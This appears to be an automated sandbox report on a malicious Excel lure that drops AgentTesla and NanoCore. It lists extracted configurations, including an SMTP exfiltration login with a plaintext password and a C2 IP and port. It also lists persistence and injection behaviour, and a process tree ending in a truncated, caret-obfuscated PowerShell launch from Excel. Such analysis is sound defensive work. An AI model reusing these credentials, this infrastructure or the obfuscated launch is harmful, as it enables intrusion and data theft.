Analysis
-
max time kernel
150s -
max time network
135s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
26-09-2021 19:12
Static task
static1
Behavioral task
behavioral1
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win10v20210408
General
-
Target
RFQ#903_260921_new_request_10012_products.xls
-
Size
38KB
-
MD5
03cf64f6dff8c1467a756d8c2e2fac16
-
SHA1
c124554906286cdaa48240a394777b1ef6c853fe
-
SHA256
17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
-
SHA512
4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.privateemail.com - Port:
587 - Username:
[email protected] - Password:
office12#
Extracted
nanocore
1.2.2.0
185.140.53.52:4488
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-07-08T12:51:02.136438436Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4488
-
default_group
EXPO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.52
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1528 2008 cmd.exe EXCEL.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
expo.exeammero.exeInstallUtil.exepid process 992 expo.exe 1136 ammero.exe 1512 InstallUtil.exe -
Loads dropped DLL 3 IoCs
Processes:
ei.exeexpo.exepid process 1176 ei.exe 992 expo.exe 992 expo.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/1176-67-0x00000000005B0000-0x00000000005D1000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
reg.exeInstallUtil.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Subsystem = "C:\\Program Files (x86)\\UDP Subsystem\\udpss.exe" InstallUtil.exe -
Processes:
InstallUtil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
expo.exedescription pid process target process PID 992 set thread context of 1512 992 expo.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
InstallUtil.exedescription ioc process File created C:\Program Files (x86)\UDP Subsystem\udpss.exe InstallUtil.exe File opened for modification C:\Program Files (x86)\UDP Subsystem\udpss.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2008 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exepid process 1884 powershell.exe 1176 ei.exe 1176 ei.exe 1176 ei.exe 1176 ei.exe 1176 ei.exe 992 expo.exe 992 expo.exe 1136 ammero.exe 1136 ammero.exe 1512 InstallUtil.exe 1512 InstallUtil.exe 1512 InstallUtil.exe 1512 InstallUtil.exe 1512 InstallUtil.exe 1512 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
InstallUtil.exepid process 1512 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1176 ei.exe Token: SeDebugPrivilege 992 expo.exe Token: SeDebugPrivilege 1136 ammero.exe Token: SeDebugPrivilege 1512 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2008 EXCEL.EXE 2008 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 2008 EXCEL.EXE 2008 EXCEL.EXE 2008 EXCEL.EXE -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeei.execmd.exeexpo.exeInstallUtil.exedescription pid process target process PID 2008 wrote to memory of 1528 2008 EXCEL.EXE cmd.exe PID 2008 wrote to memory of 1528 2008 EXCEL.EXE cmd.exe PID 2008 wrote to memory of 1528 2008 EXCEL.EXE cmd.exe PID 2008 wrote to memory of 1528 2008 EXCEL.EXE cmd.exe PID 1528 wrote to memory of 1884 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1884 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1884 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 1884 1528 cmd.exe powershell.exe PID 1884 wrote to memory of 1176 1884 powershell.exe ei.exe PID 1884 wrote to memory of 1176 1884 powershell.exe ei.exe PID 1884 wrote to memory of 1176 1884 powershell.exe ei.exe PID 1884 wrote to memory of 1176 1884 powershell.exe ei.exe PID 1176 wrote to memory of 1060 1176 ei.exe cmd.exe PID 1176 wrote to memory of 1060 1176 ei.exe cmd.exe PID 1176 wrote to memory of 1060 1176 ei.exe cmd.exe PID 1176 wrote to memory of 1060 1176 ei.exe cmd.exe PID 1060 wrote to memory of 944 1060 cmd.exe reg.exe PID 1060 wrote to memory of 944 1060 cmd.exe reg.exe PID 1060 wrote to memory of 944 1060 cmd.exe reg.exe PID 1060 wrote to memory of 944 1060 cmd.exe reg.exe PID 1176 wrote to memory of 992 1176 ei.exe expo.exe PID 1176 wrote to memory of 992 1176 ei.exe expo.exe PID 1176 wrote to memory of 992 1176 ei.exe expo.exe PID 1176 wrote to memory of 992 1176 ei.exe expo.exe PID 992 wrote to memory of 1136 992 expo.exe ammero.exe PID 992 wrote to memory of 1136 992 expo.exe ammero.exe PID 992 wrote to memory of 1136 992 expo.exe ammero.exe PID 992 wrote to memory of 1136 992 expo.exe ammero.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 992 wrote to memory of 1512 992 expo.exe InstallUtil.exe PID 1512 wrote to memory of 1900 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 1900 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 1900 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 1900 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 968 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 968 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 968 1512 InstallUtil.exe schtasks.exe PID 1512 wrote to memory of 968 1512 InstallUtil.exe schtasks.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E 